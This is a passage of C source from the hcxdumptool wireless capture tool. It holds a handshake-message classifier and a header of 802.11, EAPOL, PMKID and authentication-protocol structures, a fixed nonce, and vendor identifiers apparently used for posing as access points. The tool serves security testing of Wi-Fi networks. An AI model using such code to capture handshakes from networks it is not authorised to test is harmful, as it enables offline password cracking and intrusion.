struct { uint8_t termination; #define EAPREQLIST_TERM_ENDTLS 0xfd #define EAPREQLIST_TERM_DEAUTH 0xfe #define EAPREQLIST_TERM_NOTERM 0xff uint16_t length; uint8_t type; uint8_t data[EAP_LEN_MAX]; uint8_t mode; #define EAPREQLIST_MODE_TLS 1 }eapreqlist_t; #define EAPREQLIST_SIZE (sizeof(eapreqlist_t)) /*===========================================================================*/ typedef struct { int frequency; int channel; }fscanlist_t; #define FSCANLIST_SIZE (sizeof(fscanlist_t)) /*===========================================================================*/ hcxdumptool-6.2.5/include/ieee80211.c000066400000000000000000000007701415170014400171650ustar00rootroot00000000000000#include "ieee80211.h" /*===========================================================================*/ int getkeyinfo(uint16_t ki) { if(ki & WPA_KEY_INFO_ACK) { if(ki & WPA_KEY_INFO_INSTALL) { /* handshake 3 */ return 3; } else { /* handshake 1 */ return 1; } } else { if(ki & WPA_KEY_INFO_SECURE) { /* handshake 4 */ return 4; } else { /* handshake 2 */ return 2; } } return 0; } /*===========================================================================*/ hcxdumptool-6.2.5/include/ieee80211.h000066400000000000000000000670111415170014400171730ustar00rootroot00000000000000#define MYREPLAYCOUNT 63232 #define MAC_SIZE_ACK (10) #define MAC_SIZE_RTS (16) #define MAC_SIZE_NORM (24) #define MAC_SIZE_QOS (26) #define MAC_SIZE_LONG (30) #define MAC_SIZE_QOS_LONG (32) #define FCS_LEN 4 /* types */ #define IEEE80211_FTYPE_MGMT 0x0 #define IEEE80211_FTYPE_CTL 0x1 #define IEEE80211_FTYPE_DATA 0x2 #define IEEE80211_FTYPE_RCVD 0x3 /* management */ #define IEEE80211_STYPE_ASSOC_REQ 0x0 #define IEEE80211_STYPE_ASSOC_RESP 0x1 #define IEEE80211_STYPE_REASSOC_REQ 0x2 #define IEEE80211_STYPE_REASSOC_RESP 0x3 #define IEEE80211_STYPE_PROBE_REQ 0x4 #define IEEE80211_STYPE_PROBE_RESP 0x5 #define IEEE80211_STYPE_BEACON 0x8 #define IEEE80211_STYPE_ATIM 0x9 #define IEEE80211_STYPE_DISASSOC 0xa #define IEEE80211_STYPE_AUTH 0xb #define IEEE80211_STYPE_DEAUTH 0xc #define IEEE80211_STYPE_ACTION 0xd #define IEEE80211_STYPE_NACK 0xe #define IEEE80211_STYPE_MGTRESERVED 0xf /* control */ #define IEEE80211_STYPE_CTL_EXT 0x6 #define IEEE80211_STYPE_BACK_REQ 0x8 #define IEEE80211_STYPE_BACK 0x9 #define IEEE80211_STYPE_PSPOLL 0xa #define IEEE80211_STYPE_RTS 0xb #define IEEE80211_STYPE_CTS 0xc #define IEEE80211_STYPE_ACK 0xd #define IEEE80211_STYPE_CFEND 0xe #define IEEE80211_STYPE_CFENDACK 0xf /* data */ #define IEEE80211_STYPE_DATA 0x0 #define IEEE80211_STYPE_DATA_CFACK 0x1 #define IEEE80211_STYPE_DATA_CFPOLL 0x2 #define IEEE80211_STYPE_DATA_CFACKPOLL 0x3 #define IEEE80211_STYPE_NULLFUNC 0x4 #define IEEE80211_STYPE_CFACK 0x5 #define IEEE80211_STYPE_CFPOLL 0x6 #define IEEE80211_STYPE_CFACKPOLL 0x7 #define IEEE80211_STYPE_QOS_DATA 0x8 #define IEEE80211_STYPE_QOS_DATA_CFACK 0x9 #define IEEE80211_STYPE_QOS_DATA_CFPOLL 0xa #define IEEE80211_STYPE_QOS_DATA_CFACKPOLL 0xb #define IEEE80211_STYPE_QOS_NULLFUNC 0xc #define IEEE80211_STYPE_QOS_CFACK 0xd #define IEEE80211_STYPE_QOS_CFPOLL 0xe #define IEEE80211_STYPE_QOS_CFACKPOLL 0xf /* Reason codes (IEEE 802.11-2007, 7.3.1.7, Table 7-22) */ #define WLAN_REASON_UNSPECIFIED 1 #define WLAN_REASON_PREV_AUTH_NOT_VALID 2 #define WLAN_REASON_DEAUTH_LEAVING 3 #define WLAN_REASON_DISASSOC_DUE_TO_INACTIVITY 4 #define WLAN_REASON_DISASSOC_AP_BUSY 5 #define WLAN_REASON_CLASS2_FRAME_FROM_NONAUTH_STA 6 #define WLAN_REASON_CLASS3_FRAME_FROM_NONASSOC_STA 7 #define WLAN_REASON_DISASSOC_STA_HAS_LEFT 8 #define WLAN_REASON_STA_REQ_ASSOC_WITHOUT_AUTH 9 /* IEEE 802.11h */ #define WLAN_REASON_PWR_CAPABILITY_NOT_VALID 10 #define WLAN_REASON_SUPPORTED_CHANNEL_NOT_VALID 11 /* IEEE 802.11i */ #define WLAN_REASON_INVALID_IE 13 #define WLAN_REASON_MICHAEL_MIC_FAILURE 14 #define WLAN_REASON_4WAY_HANDSHAKE_TIMEOUT 15 #define WLAN_REASON_GROUP_KEY_UPDATE_TIMEOUT 16 #define WLAN_REASON_IE_IN_4WAY_DIFFERS 17 #define WLAN_REASON_GROUP_CIPHER_NOT_VALID 18 #define WLAN_REASON_PAIRWISE_CIPHER_NOT_VALID 19 #define WLAN_REASON_AKMP_NOT_VALID 20 #define WLAN_REASON_UNSUPPORTED_RSN_IE_VERSION 21 #define WLAN_REASON_INVALID_RSN_IE_CAPAB 22 #define WLAN_REASON_IEEE_802_1X_AUTH_FAILED 23 #define WLAN_REASON_CIPHER_SUITE_REJECTED 24 #define IEEE80211_SEQ_SEQ_MASK 0xfff0 #define IEEE80211_SEQ_SEQ_SHIFT 4 #define WBIT(n) (1 << (n)) #define WPA_KEY_INFO_TYPE_MASK (WBIT(0) | WBIT(1) | WBIT(2)) #define WPA_KEY_INFO_TYPE_HMAC_MD5_RC4 WBIT(0) #define WPA_KEY_INFO_TYPE_HMAC_SHA1_AES WBIT(1) #define WPA_KEY_INFO_KEY_TYPE WBIT(3) /* 1 = Pairwise, 0 = Group key */ #define WPA_KEY_INFO_KEY_INDEX_MASK (WBIT(4) | WBIT(5)) #define WPA_KEY_INFO_KEY_INDEX_SHIFT 4 #define WPA_KEY_INFO_INSTALL WBIT(6) /* pairwise */ #define WPA_KEY_INFO_TXRX WBIT(6) /* group */ #define WPA_KEY_INFO_ACK WBIT(7) #define WPA_KEY_INFO_MIC WBIT(8) #define WPA_KEY_INFO_SECURE WBIT(9) #define WPA_KEY_INFO_ERROR WBIT(10) #define WPA_KEY_INFO_REQUEST WBIT(11) #define WPA_KEY_INFO_ENCR_KEY_DATA WBIT(12) /* IEEE 802.11i/RSN only */ /*===========================================================================*/ enum ieee80211_radiotap_presence { IEEE80211_RADIOTAP_TSFT = 0x00000001, IEEE80211_RADIOTAP_FLAGS = 0x00000002, IEEE80211_RADIOTAP_RATE = 0x00000004, IEEE80211_RADIOTAP_CHANNEL = 0x00000008, IEEE80211_RADIOTAP_FHSS = 0x00000010, IEEE80211_RADIOTAP_DBM_ANTSIGNAL = 0x00000020, IEEE80211_RADIOTAP_DBM_ANTNOISE = 0x00000040, IEEE80211_RADIOTAP_LOCK_QUALITY = 0x00000080, IEEE80211_RADIOTAP_TX_ATTENUATION = 0x00000100, IEEE80211_RADIOTAP_DB_TX_ATTENUATION = 0x00000200, IEEE80211_RADIOTAP_DBM_TX_POWER = 0x00000400, IEEE80211_RADIOTAP_ANTENNA = 0x00000800, IEEE80211_RADIOTAP_DB_ANTSIGNAL = 0x00001000, IEEE80211_RADIOTAP_DB_ANTNOISE = 0x00002000, IEEE80211_RADIOTAP_RX_FLAGS = 0x00004000, IEEE80211_RADIOTAP_TX_FLAGS = 0x00008000, IEEE80211_RADIOTAP_RTS_RETRIES = 0x00010000, IEEE80211_RADIOTAP_DATA_RETRIES = 0x00020000, /* 18 is XChannel, not defined */ IEEE80211_RADIOTAP_MCS = 0x00080000, IEEE80211_RADIOTAP_AMPDU_STATUS = 0x00100000, IEEE80211_RADIOTAP_VHT = 0x00200000, IEEE80211_RADIOTAP_TIMESTAMP = 0x00400000, /* valid in every it_present bitmap, even vendor namespaces */ IEEE80211_RADIOTAP_RADIOTAP_NAMESPACE = 0x20000000, IEEE80211_RADIOTAP_VENDOR_NAMESPACE = 0x40000000, IEEE80211_RADIOTAP_EXT = 0x80000000, }; enum ieee80211_radiotap_flags { IEEE80211_RADIOTAP_F_CFP = 0x01, IEEE80211_RADIOTAP_F_SHORTPRE = 0x02, IEEE80211_RADIOTAP_F_WEP = 0x04, IEEE80211_RADIOTAP_F_FRAG = 0x08, IEEE80211_RADIOTAP_F_FCS = 0x10, IEEE80211_RADIOTAP_F_DATAPAD = 0x20, IEEE80211_RADIOTAP_F_BADFCS = 0x40, }; struct radiotap_header { uint8_t it_version; uint8_t it_pad; uint16_t it_len; uint32_t it_present; } __attribute__((__packed__)); typedef struct radiotap_header rth_t; #define RTH_SIZE (sizeof(rth_t)) /*===========================================================================*/ struct ethernet2_header { uint8_t addr1[6]; uint8_t addr2[6]; uint16_t ether_type; } __attribute__((packed)); typedef struct ethernet2_header eth2_t; #define ETH2_SIZE (sizeof(eth2_t)) /*===========================================================================*/ struct loopback_header { uint32_t family; } __attribute__((packed)); typedef struct loopback_header loba_t; #define LOBA_SIZE (sizeof(loba_t)) /*===========================================================================*/ #define WLAN_DEVNAMELEN_MAX 16 struct prism_item { uint32_t did; uint16_t status; uint16_t len; uint32_t data; } __attribute__((packed)); struct prism_header { uint32_t msgcode; uint32_t msglen; char devname[WLAN_DEVNAMELEN_MAX]; struct prism_item hosttime; struct prism_item mactime; struct prism_item channel; struct prism_item rssi; struct prism_item sq; struct prism_item signal; struct prism_item noise; struct prism_item rate; struct prism_item istx; struct prism_item frmlen; } __attribute__((packed)); typedef struct prism_item prism_item_t; typedef struct prism_header prism_t; #define PRISM_SIZE (sizeof(prism_t)) /*===========================================================================*/ struct avs_header { uint32_t version; uint32_t len; uint64_t mactime; uint64_t hosttime; uint32_t phytype; uint32_t channel; uint32_t datarate; uint32_t antenna; uint32_t priority; uint32_t ssi_type; int32_t ssi_signal; int32_t ssi_noise; uint32_t preamble; uint32_t encoding; } __attribute__((packed)); typedef struct avs_header avs_t; #define AVS_SIZE (sizeof(avs_t)) /*===========================================================================*/ struct ppi_header { uint8_t pph_version; uint8_t pph_flags; uint16_t pph_len; uint32_t pph_dlt; } __attribute__((packed)); typedef struct ppi_header ppi_t; #define PPI_SIZE (sizeof(ppi_t)) /*===========================================================================*/ struct msnetmon_header { uint8_t version_minor; uint8_t version_major; uint16_t network; uint16_t ts_year; uint16_t ts_month; uint16_t ts_weekday; uint16_t ts_day; uint16_t ts_hour; uint16_t ts_min; uint16_t ts_sec; uint16_t ts_msec; uint32_t frametableoffset; uint32_t frametablelength; uint32_t userdataoffset; uint32_t userdatalength; uint32_t commentdataoffset; uint32_t commentdatalength; uint32_t statisticsoffset; uint32_t statisticslength; uint32_t networkinfooffset; uint32_t networkinfolength; } __attribute__((packed)); typedef struct msnetmon_header msntm_t; #define MSNETMON_SIZE (sizeof(msntm_t)) /*===========================================================================*/ struct fcs_frame { uint32_t fcs; }; typedef struct fcs_frame fcs_t; #define FCS_SIZE (sizeof(fcs_t)) /*===========================================================================*/ struct qos_frame { uint8_t control; uint8_t flags; } __attribute__((__packed__)); typedef struct qos_frame qos_t; #define QOS_SIZE (sizeof(qos_t)) /*===========================================================================*/ /* * DS bit usage * * TA = transmitter address * RA = receiver address * DA = destination address * SA = source address * * ToDS FromDS A1(RA) A2(TA) A3 A4 Use * ----------------------------------------------------------------- * 0 0 DA SA BSSID - IBSS/DLS * 0 1 DA BSSID SA - AP -> STA * 1 0 BSSID SA DA - AP <- STA * 1 1 RA TA DA SA unspecified (WDS) */ struct mac_frame { #ifdef BIG_ENDIAN_HOST unsigned subtype : 4; unsigned type : 2; unsigned version : 2; unsigned ordered : 1; unsigned prot : 1; unsigned more_data : 1; unsigned power : 1; unsigned retry : 1; unsigned more_frag : 1; unsigned from_ds : 1; unsigned to_ds : 1; #else unsigned version : 2; unsigned type : 2; unsigned subtype : 4; unsigned to_ds : 1; unsigned from_ds : 1; unsigned more_frag : 1; unsigned retry : 1; unsigned power : 1; unsigned more_data : 1; unsigned prot : 1; unsigned ordered : 1; #endif uint16_t duration; uint8_t addr1[6]; uint8_t addr2[6]; uint8_t addr3[6]; uint16_t sequence; uint8_t addr4[6]; qos_t qos; } __attribute__((__packed__)); typedef struct mac_frame mac_t; /*===========================================================================*/ struct capabilities_ap_frame { uint64_t timestamp; uint16_t beaconintervall; uint16_t capabilities; } __attribute__((__packed__)); typedef struct capabilities_ap_frame capap_t; #define CAPABILITIESAP_SIZE sizeof(capap_t) /*===========================================================================*/ struct capabilities_sta_frame { uint16_t capabilities; uint16_t listeninterval; } __attribute__((__packed__)); typedef struct capabilities_sta_frame capsta_t; #define CAPABILITIESSTA_SIZE sizeof(capsta_t) /*===========================================================================*/ struct capabilitiesreq_sta_frame { uint16_t capabilities; uint16_t listeninterval; uint8_t addr[6]; } __attribute__((__packed__)); typedef struct capabilitiesreq_sta_frame capreqsta_t; #define CAPABILITIESREQSTA_SIZE sizeof(capreqsta_t) /*===========================================================================*/ struct ie_tag { uint8_t id; #define TAG_SSID 0x00 #define TAG_RATE 0x01 #define TAG_CHAN 0x03 #define TAG_COUNTRY 0x07 #define TAG_RSN 0x30 #define TAG_PAG 0xde #define TAG_VENDOR 0xdd uint8_t len; uint8_t data[1]; } __attribute__((__packed__)); typedef struct ie_tag ietag_t; #define IETAG_SIZE offsetof(ietag_t, data) /*===========================================================================*/ struct vendorie_tag { uint8_t oui[3]; uint8_t ouitype; #define VT_WPA_IE 0x01 #define VT_RSN_IE 0x02 #define VT_WMM_IE 0x02 #define VT_WPS_IE 0x04 #define VT_AWDL_IE 0x08 #define VT_NAN_IE 0x13 uint8_t data[1]; } __attribute__ ((packed)); typedef struct vendorie_tag vendorie_t; #define VENDORIE_SIZE offsetof(vendorie_t, data) static const uint8_t ouimscorp[3] = { 0x00, 0x50, 0xf2 }; static const uint8_t ouiapple[3] = { 0x00, 0x17, 0xf2 }; static const uint8_t ouiwifialliance[3] = { 0x50, 0x6f, 0x9a }; /*===========================================================================*/ struct rsnie_tag { uint16_t version; uint8_t data[1]; } __attribute__((__packed__)); typedef struct rsnie_tag rsnie_t; #define RSNIE_SIZE offsetof(rsnie_t, data) #define RSNIE_LEN_MIN 20 /*===========================================================================*/ struct wpaie_tag { uint8_t oui[3]; uint8_t ouitype; uint16_t type; uint8_t data[1]; } __attribute__ ((packed)); typedef struct wpaie_tag wpaie_t; #define WPAIE_SIZE offsetof(wpaie_t, data) #define OUI_SIZE 3 #define WPAIE_LEN_MIN 22 /*===========================================================================*/ struct suitecount_s { uint16_t count; uint8_t data[1]; } __attribute__ ((packed)); typedef struct suitecount_s suitecount_t; #define SUITECOUNT_SIZE offsetof(suitecount_t, data) /*===========================================================================*/ struct suite_s { uint8_t oui[3]; uint8_t type; #define CS_WEP40 1 #define CS_TKIP 2 #define CS_WRAP 3 #define CS_CCMP 4 #define CS_WEP104 5 #define CS_BIP 6 #define CS_NOT_ALLOWED 7 #define AK_PMKSA 1 #define AK_PSK 2 #define AK_FT 3 #define AK_FT_PSK 4 #define AK_PMKSA256 5 #define AK_PSKSHA256 6 #define AK_TDLS 7 #define AK_SAE_SHA256 8 #define AK_FT_SAE 9 } __attribute__ ((packed)); typedef struct suite_s suite_t; #define SUITE_SIZE sizeof(suite_t) static const uint8_t suiteoui[3] = { 0x00, 0x0f, 0xac }; /*===========================================================================*/ struct rsncapabilites_s { uint16_t rsncapa; }; typedef struct rsncapabilites_s rsncapabilites_t; #define RSNCAPABILITIES_SIZE sizeof(rsncapabilites_t) /*===========================================================================*/ struct llc_frame { uint8_t dsap; uint8_t ssap; uint8_t control; uint8_t org[3]; uint16_t type; #define LLC_TYPE_AUTH 0x888e #define LLC_TYPE_IPV4 0x0800 #define LLC_TYPE_IPV6 0x86dd #define LLC_TYPE_PREAUT 0x88c7 #define LLC_TYPE_FRRR 0x890d }; typedef struct llc_frame llc_t; #define LLC_SIZE (sizeof(llc_t)) #define LLC_SNAP 0xaa /*===========================================================================*/ struct authentication_frame { uint16_t algorithm; #define OPEN_SYSTEM 0 #define SHARED_KEY 1 #define FBT 2 #define SAE 3 #define FILS 4 #define FILSPFS 5 #define FILSPK 6 #define NETWORKEAP 128 uint16_t sequence; uint16_t statuscode; #define AUTH_OK 0 #define AUTH_FAILURE 1 #define AUTH_UNSUPPORTED 10 #define AUTH_REASSOC_DENIED 11 #define AUTH_UNSECIFIED 12 } __attribute__((__packed__)); typedef struct authentication_frame authf_t; #define AUTHENTICATIONFRAME_SIZE (sizeof(authf_t)) /*===========================================================================*/ struct sae_commit_authentication_frame { uint16_t group_id; uint8_t scalar[32]; uint8_t commit_element_x[32]; uint8_t commit_element_y[32]; } __attribute__((__packed__)); typedef struct sae_commit_authentication_frame saecommitauthf_t; #define SAECOMMITAUTHENTICATIONFRAME_SIZE (sizeof(saecommitauthf_t)) /*===========================================================================*/ struct sae_confirm_authentication_frame { uint16_t send_confirm; uint8_t confirm[32]; } __attribute__((__packed__)); typedef struct sae_confirm_authentication_frame saeconfirmauthf_t; #define SAECONFIRMAUTHENTICATIONFRAME_SIZE (sizeof(saeconfirmauthf_t)) /*===========================================================================*/ struct association_resp_frame { uint16_t capabilities; uint16_t authentication_seq; uint16_t statuscode; uint16_t id; } __attribute__((__packed__)); typedef struct association_resp_frame assocrepf_t; #define ASSOCIATIONRESPFRAME_SIZE (sizeof(assocrepf_t)) /*===========================================================================*/ struct action_frame { uint8_t categoriecode; #define CAT_BLOCK_ACK 0x03 #define CAT_RADIO_MEASUREMENT 0x05 #define CAT_VENDOR 0x7f uint8_t actioncode; #define ACT_ADD_BLOCK_ACK_REQ 0x00 #define ACT_ADD_BLOCK_ACK_RESP 0x00 #define ACT_DELETE_BLOCK_REQ 0x02 #define ACT_RADIO_MEASUREMENT_REQ 0x00 }; typedef struct action_frame actf_t; #define ACTIONFRAME_SIZE (sizeof(actf_t)) /*===========================================================================*/ struct actionvendor_frame { uint8_t categoriecode; uint8_t vendor[3]; }; typedef struct actionvendor_frame actvf_t; #define ACTIONVENDORFRAME_SIZE (sizeof(actvf_t)) /*===========================================================================*/ struct actionmeasurement_frame { uint8_t categoriecode; uint8_t actioncode; #define ACT_MM_NRREQ 4 #define ACT_MM_NRRESP 5 uint8_t dialogtoken; }; typedef struct actionmeasurement_frame actmm_t; #define ACTIONMEASUREMENTFRAME_SIZE (sizeof(actmm_t)) /*===========================================================================*/ struct eapauthentication_s { uint8_t version; uint8_t type; #define EAP_PACKET 0 #define EAPOL_START 1 #define EAPOL_LOGOFF 2 #define EAPOL_KEY 3 #define EAPOL_ASF 4 #define EAPOL_MKA 5 uint16_t len; uint8_t data[1]; } __attribute__((__packed__)); typedef struct eapauthentication_s eapauth_t; #define EAPAUTH_SIZE offsetof(eapauth_t, data) /*===========================================================================*/ struct wpakey_s { uint8_t keydescriptor; uint16_t keyinfo; uint16_t keylen; uint64_t replaycount; uint8_t nonce[32]; uint8_t keyiv[16]; uint64_t keyrsc; uint8_t keyid[8]; uint8_t keymic[16]; uint16_t wpadatalen; uint8_t data[1]; } __attribute__((__packed__)); typedef struct wpakey_s wpakey_t; #define WPAKEY_SIZE offsetof(wpakey_t, data) /*===========================================================================*/ struct pmkid_s { uint8_t id; uint8_t len; uint8_t oui[3]; uint8_t type; uint8_t pmkid[16]; } __attribute__((__packed__)); typedef struct pmkid_s pmkid_t; #define PMKID_SIZE (sizeof(pmkid_t)) /*===========================================================================*/ struct rsnpmkidlist_s { uint16_t count; } __attribute__((__packed__)); typedef struct rsnpmkidlist_s rsnpmkidlist_t; #define RSNPMKIDLIST_SIZE (sizeof(rsnpmkidlist_t)) /*===========================================================================*/ struct exteap_frame { uint8_t code; #define EAP_CODE_REQ 1 #define EAP_CODE_RESP 2 #define EAP_CODE_SUCCESS 3 #define EAP_CODE_FAILURE 4 #define EAP_CODE_INITIATE 5 #define EAP_CODE_FINISH 6 uint8_t id; #define EAP_TYPE_ID 1 uint16_t len; uint8_t type; #define EAP_TYPE_EAP 0 #define EAP_TYPE_ID 1 #define EAP_TYPE_NOTIFY 2 #define EAP_TYPE_NAK 3 #define EAP_TYPE_MD5 4 #define EAP_TYPE_OTP 5 #define EAP_TYPE_GTC 6 #define EAP_TYPE_RSA 9 #define EAP_TYPE_DSS 10 #define EAP_TYPE_KEA 11 #define EAP_TYPE_KEA_VALIDATE 12 #define EAP_TYPE_TLS 13 #define EAP_TYPE_AXENT 14 #define EAP_TYPE_RSA_SSID 15 #define EAP_TYPE_RSA_ARCOT 16 #define EAP_TYPE_LEAP 17 #define EAP_TYPE_SIM 18 #define EAP_TYPE_SRP_SHA1 19 #define EAP_TYPE_TTLS 21 #define EAP_TYPE_RAS 22 #define EAP_TYPE_AKA 23 #define EAP_TYPE_3COMEAP 24 #define EAP_TYPE_PEAP 25 #define EAP_TYPE_MSEAP 26 #define EAP_TYPE_MAKE 27 #define EAP_TYPE_CRYPTOCARD 28 #define EAP_TYPE_MSCHAPV2 29 #define EAP_TYPE_DYNAMICID 30 #define EAP_TYPE_ROB 31 #define EAP_TYPE_POTP 32 #define EAP_TYPE_MSTLV 33 #define EAP_TYPE_SENTRI 34 #define EAP_TYPE_AW 35 #define EAP_TYPE_CSBA 36 #define EAP_TYPE_AIRFORT 37 #define EAP_TYPE_HTTPD 38 #define EAP_TYPE_SS 39 #define EAP_TYPE_DC 40 #define EAP_TYPE_SPEKE 41 #define EAP_TYPE_MOBAC 42 #define EAP_TYPE_FAST 43 #define EAP_TYPE_ZLXEAP 44 #define EAP_TYPE_LINK 45 #define EAP_TYPE_PAX 46 #define EAP_TYPE_PSK 47 #define EAP_TYPE_SAKE 48 #define EAP_TYPE_IKEV2 49 #define EAP_TYPE_AKA1 50 #define EAP_TYPE_GPSK 51 #define EAP_TYPE_PWD 52 #define EAP_TYPE_EKE1 53 #define EAP_TYPE_PTEAP 54 #define EAP_TYPE_TEAP 55 #define EAP_TYPE_EXPAND 254 #define EAP_TYPE_EXPERIMENTAL 255 uint8_t data[1]; } __attribute__((__packed__)); typedef struct exteap_frame exteap_t; #define EXTEAP_SIZE offsetof(exteap_t, data) /*===========================================================================*/ struct eapleap_frame { uint8_t code; uint8_t id; uint16_t len; uint8_t type; uint8_t version; uint8_t reserved; uint8_t count; uint8_t data[1]; } __attribute__((__packed__)); typedef struct eapleap_frame eapleap_t; #define EAPLEAP_SIZE offsetof(eapleap_t, data) /*===========================================================================*/ struct mpdu_frame { uint8_t pn[3]; uint8_t keyid; uint8_t exitiv[4]; }; typedef struct mpdu_frame mpdu_t; #define MPDU_SIZE (sizeof(mpdu_t)) /*===========================================================================*/ struct md5_frame { uint8_t code; uint8_t id; uint16_t len; uint8_t type; uint8_t data_len; uint8_t data[1]; } __attribute__((__packed__)); typedef struct md5_frame md5_t; #define MD5_SIZE offsetof(md5_t, data) /*===========================================================================*/ struct ipv4_frame { uint8_t ver_hlen; uint8_t tos; uint16_t len; uint16_t ipid; uint16_t flags_offset; uint8_t ttl; uint8_t nextprotocol; #define NEXTHDR_HOP 0 /* Hop-by-hop option header. */ #define NEXTHDR_ICMP4 1 /* ICMP4 header */ #define NEXTHDR_TCP 6 /* TCP segment. */ #define NEXTHDR_UDP 17 /* UDP message. */ #define NEXTHDR_IPV6 41 /* IPv6 in IPv6 */ #define NEXTHDR_ROUTING 43 /* Routing header. */ #define NEXTHDR_FRAGMENT 44 /* Fragmentation/reassembly header. */ #define NEXTHDR_GRE 47 /* GRE header. */ #define NEXTHDR_ESP 50 /* Encapsulating security payload. */ #define NEXTHDR_AUTH 51 /* Authentication header. */ #define NEXTHDR_ICMP6 58 /* ICMP6 for IPv6. */ #define NEXTHDR_NONE 59 /* No next header */ #define NEXTHDR_DEST 60 /* Destination options header. */ #define NEXTHDR_SCTP 132 /* SCTP message. */ #define NEXTHDR_MOBILITY 135 /* Mobility header. */ #define NEXTHDR_MAX 255 uint16_t checksum; uint8_t srcaddr[4]; uint8_t dstaddr[4]; } __attribute__ ((packed)); typedef struct ipv4_frame ipv4_t; #define IPV4_SIZE (sizeof(ipv4_t)) #define IPV4_SIZE_MIN 20 #define IPV4_SIZE_MAX 64 /*===========================================================================*/ struct ipv6_frame { uint32_t ver_class; uint16_t len; uint8_t nextprotocol; uint8_t hoplimint; uint8_t srcaddr[16]; uint8_t dstaddr[16]; } __attribute__ ((packed)); typedef struct ipv6_frame ipv6_t; #define IPV6_SIZE (sizeof(ipv6_t)) /*===========================================================================*/ struct tcp_frame { uint16_t sourceport; uint16_t destinationport; uint32_t sequencenumber; uint32_t acknumber; uint8_t len /* x 4 */; uint8_t flags; uint16_t window; uint16_t checksum; uint16_t urgent; uint8_t options[1]; } __attribute__ ((packed)); typedef struct tcp_frame tcp_t; #define TCP_SIZE_MIN offsetof(tcp_t, options) /*===========================================================================*/ struct udp_frame { uint16_t sourceport; uint16_t destinationport; #define UDP_DHCP_SERVERPORT 67 #define UDP_DHCP_CLIENTPORT 68 #define UDP_DHCP6_SERVERPORT 547 #define UDP_DHCP6_CLIENTPORT 546 #define UDP_RADIUS_DESTINATIONPORT 1812 #define UDP_TZSP_DESTINATIONPORT 37008 uint16_t len; uint16_t checksum; } __attribute__ ((packed)); typedef struct udp_frame udp_t; #define UDP_SIZE (sizeof(udp_t)) /*===========================================================================*/ struct tzsp_frame { uint8_t version; uint8_t type; uint16_t enc_protocol; #define TZSP_ENCAP_ETHERNET 1 #define TZSP_ENCAP_TOKEN_RING 2 #define TZSP_ENCAP_SLIP 3 #define TZSP_ENCAP_PPP 4 #define TZSP_ENCAP_FDDI 5 #define TZSP_ENCAP_RAW 7 #define TZSP_ENCAP_IEEE_802_11 18 #define TZSP_ENCAP_IEEE_802_11_PRISM 119 #define TZSP_ENCAP_IEEE_802_11_AVS 127 uint8_t data[1]; } __attribute__ ((packed)); typedef struct tzsp_frame tzsp_t; #define TZSP_SIZE offsetof(tzsp_t, data) /*===========================================================================*/ struct tzsp_tag { uint8_t tag; #define TZSP_TAG_END 1 #define TZSP_TAG_ORGLEN 41 uint8_t len; uint8_t data[1]; } __attribute__ ((packed)); typedef struct tzsp_tag tzsptag_t; #define TZSPTAG_SIZE offsetof(tzsptag_t, data) /*===========================================================================*/ struct gre_frame { uint16_t flags; uint16_t type; uint16_t len; uint16_t callid; } __attribute__ ((packed)); typedef struct gre_frame gre_t; #define GRE_SIZE (sizeof(gre_t)) #define GREPROTO_PPP 0x880b #define GRE_FLAG_SNSET 0x1000 #define GRE_FLAG_ACKSET 0x0080 #define GRE_MASK_VERSION 0x0003 /*===========================================================================*/ struct ptp_frame { uint16_t type; } __attribute__ ((packed)); typedef struct ptp_frame ptp_t; #define PTP_SIZE (sizeof(ptp_t)) #define PROTO_PAP 0xc023 #define PROTO_CHAP 0xc223 /*===========================================================================*/ struct chap_frame { uint8_t code; #define CHAP_CODE_REQ 1 #define CHAP_CODE_RESP 2 uint8_t id; uint16_t len; uint8_t data[1]; } __attribute__ ((packed)); typedef struct chap_frame chap_t; #define CHAP_SIZE (sizeof(chap_t)) /*===========================================================================*/ struct tacacsp_frame { uint8_t version; #define TACACSP_VERSION 0xc0 uint8_t type; #define TACACS_AUTHENTICATION 1 uint8_t sequencenr; uint8_t flags; uint32_t sessionid; uint32_t len; uint8_t data[1]; } __attribute__ ((packed)); typedef struct tacacsp_frame tacacsp_t; #define TACACSP_SIZE offsetof(tacacsp_t, data) /*===========================================================================*/ #define RADIUS_AUTHENTICATOR_LENGTH 16 #define RADIUS_PASSWORD_BLOCK_SIZE 16 #define RADIUS_HEADER_LENGTH 20 #define RADIUS_MAX_SIZE 1000 #define RADIUS_MAX_ATTRIBUTE_SIZE 253 struct radius_frame_t { uint8_t code; uint8_t id; uint16_t length; uint8_t authenticator[RADIUS_AUTHENTICATOR_LENGTH]; uint8_t attrs[RADIUS_MAX_SIZE -RADIUS_HEADER_LENGTH]; uint8_t data[1]; } __attribute__ ((packed)); typedef struct radius_frame_t radius_t; #define RADIUS_SIZE offsetof(radius_t, data) /*===========================================================================*/ /* global var */ static const uint8_t zeroed32[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; #define NULLNONCE_SIZE (sizeof(nullnonce)) static const uint8_t mynonce[] = { 0x68, 0x20, 0x09, 0xe2, 0x1f, 0x0e, 0xbc, 0xe5, 0x62, 0xb9, 0x06, 0x5b, 0x54, 0x89, 0x79, 0x09, 0x9a, 0x65, 0x52, 0x86, 0xc0, 0x77, 0xea, 0x28, 0x2f, 0x6a, 0xaf, 0x13, 0x8e, 0x50, 0xcd, 0xb9 }; #define ANONCE_SIZE sizeof(anonce) static const uint8_t mac_broadcast[] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }; static const uint8_t mac_null[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; static const int myvendorap[] = { 0x00006c, 0x000101, 0x00054f, 0x000578, 0x000b18, 0x000bf4, 0x000c53, 0x000d58, 0x000da7, 0x000dc2, 0x000df2, 0x000e17, 0x000e22, 0x000e2a, 0x000eef, 0x000f09, 0x0016b4, 0x001761, 0x001825, 0x002067, 0x00221c, 0x0022f1, 0x00234a, 0x00238c, 0x0023f7, 0x002419, 0x0024fb, 0x00259d, 0x0025df, 0x00269f, 0x005047, 0x005079, 0x0050c7, 0x0084ed, 0x0086a0, 0x00a054, 0x00a085, 0x00bb3a, 0x00cb00, 0x0418b6, 0x0c8112, 0x100000, 0x10ae60, 0x10b713, 0x1100aa, 0x111111, 0x140708, 0x146e0a, 0x18421d, 0x1cf4ca, 0x205b2a, 0x20d160, 0x24336c, 0x24bf74, 0x28ef01, 